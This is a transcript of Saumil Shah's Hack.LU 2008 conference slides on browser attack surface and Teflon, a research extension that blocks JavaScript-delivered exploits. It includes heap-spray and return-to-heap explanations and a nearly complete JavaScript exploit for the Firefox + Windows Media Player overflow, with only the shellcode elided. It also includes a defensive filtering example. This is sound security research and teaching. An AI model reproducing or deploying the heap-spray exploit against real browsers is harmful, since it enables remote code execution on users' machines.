Saumil Shah
ceo, net-square
Teflon: Anti-stick for the browser's attack surface
Hack.LU 2008 – Luxembourg
© net-square
# who am i
• Saumil Shah
ceo, net-square solutions
instructor: "The Exploit Laboratory"
author: "Web Hacking - Attacks and Defense"
# who am i
16:08 up 4:26, 1 user, load averages: 0.28 0.40 0.33
USER TTY FROM LOGIN@ IDLE WHAT
saumil console - 11:43 0:05 bash
Web 2.0's attack surface
• It's all about the browser.
• The browser is the desktop of tomorrow...
• ...and as secure as the desktop of the 90s.
• The most fertile target area for exploitation.
• What do today's browsers look like?
Today's average browser
Browser Architecture
[Diagram, built up over three slides. Layers shown: DOM; HTML+CSS and Javascript; plugins and components (ActiveX, mime types, BHO, Flash, libraries, Silverlight, AIR); Ajax libs; Ajax/rich apps; user loaded content: <img> <iframe> <script> <object> <div> <style> <embed> <span> <table> <form> <input> ... etc.]
The Browser is Desktop 2.0
"Same Same But Different"
The Browser – Kernel analogy
[Diagram, built up over six slides. Browser side: DOM; HTML+CSS and Javascript; plugins (ActiveX, mime types, BHO, Flash, Gears, Silverlight, AIR); Ajax libs; Ajax/rich apps; user loaded content. Operating system side: Kernel; System Call libs; drivers (Network, File System, HID, Display, Spl. Driver); LibC; C Runtime; Userland programs.]
Browser = OS
Browser Core = Kernel
Plugin / Extensions = Drivers
HTML / DHTML / JS = Userland code
browser: <H1>hello world</H1> <script>alert('hi');</script>
OS: printf("Hello World\n");
<object>, <embed> = syscalls
browser: <object clsid="XX-YYY-ZZ"> <embed src="file.mp4">
OS: exec("program.bin"); open("file.mp4");
XHR = Sockets
browser: xhr = new XMLHttpRequest()
OS: s = socket();
Browser "syscalls"
[Diagram, built up over three slides. HTML is loaded; Javascript and HTML act on the DOM, which sits beside the plugins: Flash, PDF, QuickTime, other libs.]
document.write("<object CLSID=XXX-XXXX-XXX>");
Exploiting a browser
• Built-in interpreted language – Javascript.
• Craft the exploit locally, via JS.
• Pre-load the process memory exactly as you like, thanks to HTML and JS.
• Buffer overflows in browsers or components.
• Practical exploitation – Return to heap.
Exploiting a browser
• ASLR, DEP, NX, GS, Return to stack, Return to shared lib, ... doesn't bother us.
• Spraying the heap, and then jumping into it.
• Map the memory just-in-time.
• Pioneered by Skylined.
• "Heap Feng Shui" by Alexander Sotirov.
Heap Spraying
[Diagram: heap blocks a[7], a[8], a[9], each holding a NOP sled followed by shellcode.]
<script>
:
spray = build_large_nopsled();
a = new Array();
for(i = 0; i < 100; i++) a[i] = spray + shellcode;
:
</script>
<html>
:
exploit trigger condition goes here
:
</html>
How it all works
[Diagram: process memory from 0x00000000 to 0xFFFFFFFF, holding code and stuff, the heap and the stack. Frames on the stack hold var1, var2, var3, var4 and the saved return addresses (ret EIP). Overflow in var 3.]
The Heap...sprayed
[Same memory diagram: part of the heap gets "sprayed".]
<script>
:
for(i = 0; i < 50; i++) a[i] = nops + shellcode;
:
</script>
Return to Heap
[Same memory diagram: overwrite saved EIP: AAAAAAAAAAAAAAAAAAAAAAAAAA heapaddr. Exploit trigger in HTML code: <object clsid=XXXXXXXX>]
[Same memory diagram: AAAAAAAAAAAAAAAAAAAAAAAAAA heapaddr. Hit one of the many sprayed blocks.]
Demo
• Step by step – building an exploit.
• Firefox + Windows Media Player.
• IE7 LinkedIn Toolbar.
Exploits delivered by Javascript
• Build up the exploit on-the-fly.
• and delivered locally.
• Super obfuscated.
• Randomly encoded each time.
• "Signature that!"
Browser defense
• Dynamic exploitation.
• Nothing blows up until the last piece of the puzzle fits.
• Unless you are "in" the browser, you'll never know.
• Anti-Virus quack remedies.
Effectiveness of Anti-Virus software
• Makes computers sluggish.
• False alarms.
• "Most popular brands have an 80% miss rate" – AusCERT.
• Heuristic recognition fell from 40-50% (2006) to 20-30% (2007) – HeiseOnline.
• Signature based scanning does not work.
• A-I techniques can be easily beaten.
New directions of R&D
• NoScript extension.
• slightly better than "turn off JS for everything".
• default deny, selected allow approach.
• Per site basis – list building exercise.
• Analysis through Spidermonkey.
• Roots in understanding obfuscated malware.
New directions of R&D
• Hooking into the JS engine via debuggers.
• http://securitylabs.websense.com/content/Blogs/2802.aspx
Teflon
• An attempt to protect browsers against JS encoded exploits.
• Doesn't allow anything to stick.
• Per-site JS disabling is too drastic.
• or for that matter whitelisting/blacklisting.
• I hate maintaining lists.
• Are you sure facebook won't deliver malware tomorrow?
Teflon - objectives
• Deep inspection of payload.
• Just block the offensive vectors.
• define offensive.
• allow the rest.
• No need to disable JS.
• ...just prevent the browser "syscalls".
• Implemented as a browser extension.
• Ideally this technology should be part of the browser's "kernel".
Teflon 0.2
• Firefox 1.5-2.0 implementation.
• Modifications to the DOM.
• document.write, innerHTML, eval, etc.
• Takes care of recursive javascript obfuscation.
• Replaces offensive vectors with <div>s.
Teflon 0.2 – lab tests
• Firefox+Windows Media Player (MS06-006)
• http://milw0rm.com/exploits/1505
• Bare exploit - The Exploit Lab style!
• Packed with /packer/
• http://dean.edwards.name/packer/
• Scriptasylum JS encoder/decoder
• http://scriptasylum.com/tutorials/encdec/encode-decode.html
• Both packer+encoder together.
Plain vanilla exploit
<script>
// calc.exe
var shellcode = unescape("%ue8fc%u0044%u0000%u458b....... ......%u6c61%u2e63%u7865%u2065%u0000");

// heap spray
var spray = unescape("%u9090%u9090%u9090%u9090%u9090%u9090%u9090%u9090");
do {
   spray += spray;
} while(spray.length < 0xc0000);
memory = new Array();
for(i = 0; i < 50; i++)
   memory[i] = spray + shellcode;

// we need approx 2200 A's to blow the buffer
buf = "";
for(i = 0; i < 550; i++)
   buf += unescape("%05%05%05%05");
buf += ".wmv";

document.write('<embed src="' + buf + '"></embed>');
</script>
/packer/
Scriptasylum encoder/decoder
Demo
• Teflon against plain vanilla exploit.
• Teflon against /packer/.
• Teflon against JS encoder.
• Teflon against packer+encoder.
Teflon 0.2 – in the wild
• Tested against www.cuteqq.cn malware.
• Encrypted and randomized JS delivery.
• MS07-004 – IE VML bug.
Without Teflon – 0wned
With Teflon – harmless div
Teflon – practical deployment
• Right now, it is just a research prototype.
• How shall we use it in practice?
• Web servers can publish a "manifest" of what is allowed (or denied).
• e.g. "My web pages should never contain OBJECTs or EMBEDs"
• or: "Only CLSID xyz is allowed"
• maybe like P3P? (we all know where that went)
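The sink filtering listed under "Teflon 0.2" and the manifest idea above, as an added example that is not Teflon's own code: a manifest decides which <object>/<embed> tags may pass, and wrappers on document.write and innerHTML replace the rest with <div>s. The names MANIFEST, neutralize, guardSinks and runPage, the data-teflon attribute, the CLSID values and the stand-in document object are all assumptions made for the example; the page script is constructed and harmless.

```javascript
// Added example; every name here is hypothetical, not Teflon's code.
// Constructed manifest: the plugin-loading markup this site may emit.
const MANIFEST = {
  filteredTags: ["object", "embed"],
  allowedClsids: ["11111111-2222-3333-4444-555555555555"], // constructed value
};
const VOID_TAGS = new Set(["embed"]); // may appear without a closing tag

// Replace disallowed <object>/<embed> tags with inert <div>s. Regex matching is
// a simplification: a filter inside the browser would act on parsed nodes.
function neutralize(html, manifest) {
  const names = manifest.filteredTags.join("|");
  const tagRe = new RegExp(`<(/?)(${names})\\b([^>]*)>`, "gi");
  const openers = {}; // per tag name: was each opener blocked? pairs closers
  const blocked = [];
  const out = String(html).replace(tagRe, (tag, slash, rawName, attrs) => {
    const name = rawName.toLowerCase();
    const stack = (openers[name] = openers[name] || []);
    if (slash) {
      const wasBlocked = stack.length ? stack.pop() : true; // stray closer: blocked
      if (!wasBlocked) return tag;
      return VOID_TAGS.has(name) ? "" : "</div>";
    }
    // Anchor on whitespace so data-clsid="..." cannot pose as clsid.
    const m = /(?:^|\s)(?:clsid|classid)\s*=\s*["']?(?:clsid:)?([^"'\s>]+)/i.exec(attrs);
    const allowed = m !== null && manifest.allowedClsids.includes(m[1].toLowerCase());
    stack.push(!allowed);
    if (allowed) return tag;
    blocked.push(name);
    const div = `<div data-teflon="blocked-${name}">`;
    return VOID_TAGS.has(name) ? div + "</div>" : div;
  });
  return { html: out, blocked };
}

// Wrap the sinks before any page script runs ("I was here first!").
function guardSinks(doc, manifest, log) {
  const rawWrite = doc.write.bind(doc);
  const filter = (s) => {
    const r = neutralize(s, manifest);
    log.push(...r.blocked);
    return r.html;
  };
  doc.write = (...parts) => rawWrite(filter(parts.join("")));
  let bodyHtml = "";
  Object.defineProperty(doc.body, "innerHTML", {
    get: () => bodyHtml,
    set: (s) => { bodyHtml = filter(s); },
  });
}

// Run a page script against a minimal stand-in for `document`.
function runPage(script, manifest) {
  const doc = { written: "", body: {}, write(s) { this.written += s; } };
  const log = [];
  guardSinks(doc, manifest, log);
  new Function("document", script)(doc); // nested eval() still sees this doc
  return { written: doc.written, body: doc.body.innerHTML, blocked: log };
}

// Constructed, harmless page script under two eval(unescape()) layers.
const inner =
  `document.write('<embed src="constructed.wmv"></embed><p>hi</p>');` +
  `document.body.innerHTML = '<object clsid=${MANIFEST.allowedClsids[0]}>ok</object>'` +
  ` + '<OBJECT classid="clsid:DEADBEEF-0000-0000-0000-000000000000"></OBJECT>';`;
const wrap = (js) => `eval(unescape("${escape(js)}"))`;
const layered = wrap(wrap(inner));
const result = runPage(layered, MANIFEST);
```

Because the filter sits on the sinks, the number of encoding layers does not matter: only the final string handed to document.write or innerHTML is inspected.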
Teflon 0.2 - Limitations
• Javascript is too powerful (read dangerous).
• "I was here first!" approach.
• Teflon really needs to be built right into the browser.
Where are browsers headed?
• Let's mash-up EVERYTHING.
• Standards driven by bloggers and Twits.
• We need a standard, granular security model for browsers – built in.
• Web servers, app frameworks need to play a role too.
[Captions from the slide's browser graphics: "javascript is everything"; "WebSlices - WTF"; "finally getting a decent UI"; "totally on ACID"; "fugly little snitch"]
Future R&D directions
• Can we detect heap sprays?
• Non-executable heap? it does exist...
• Signed Javascript, JARs?
• Browser "syscall" protection.
• Weren't Java applets supposed to be perfect? :-)